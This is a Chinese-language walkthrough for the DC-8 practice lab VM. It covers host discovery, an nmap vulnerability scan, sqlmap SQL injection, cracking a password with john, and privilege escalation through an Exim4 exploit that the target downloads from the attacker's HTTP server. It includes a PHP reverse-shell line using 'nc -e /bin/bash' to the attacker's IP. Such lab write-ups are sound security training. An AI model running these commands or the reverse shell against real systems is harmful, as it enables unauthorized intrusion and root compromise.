靶机
DVWA
Upload-labs
Xss-labs
Pikachu
DC-1
DC-2
DC-3
DC-4
DC-5
DC-6
DC-7
DC-8
DC-9
-
+
首页
DC-8
DC系列是专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验,目前总共有9个靶机 关注微信公众号:网络安全101,公众号内回复**DC**,即可获取DC系列靶机镜像! 导入DC8靶机,网络适配器选择NAT模式,确保和kali处于同一IP段!!! ## 信息收集 > 确定IP地址 ``` netdiscover -i eth0 -r 192.168.84.0/24 ```  > 扫描端口  > nmap 漏洞扫描 ``` nmap 192.168.84.184 -p 80 --script=vuln ```  ## web测试 > 该页面可能存在SQL注入   > SQLMAP  > 跑库-跑表-跑字段     > 使用john解密 john --wordlist=/usr/share/john/password.lst --rules dc8.txt  ``` 账户密码:john,turtle ``` > 登录成功  > 文章处写反弹shell ```php <?php exec("nc -e /bin/bash 192.168.84.174 10086"); ?> ```  邮件里面随便填写内容后提交  > 获得shell  e ## 提权 > 查看是否有可用的SUID提权 find / -user root -perm -4000 -print 2>/dev/null  > exim4 Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统 查看版本,4.0以上  > 查询是否存在历史漏洞  拷贝到当前目录  > http服务 攻击机开启http服务  目标机将46996.sh文件使用wget 命令下载到本地  > 添加执行权限   > flag 
毛林
2025年9月7日 11:42
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码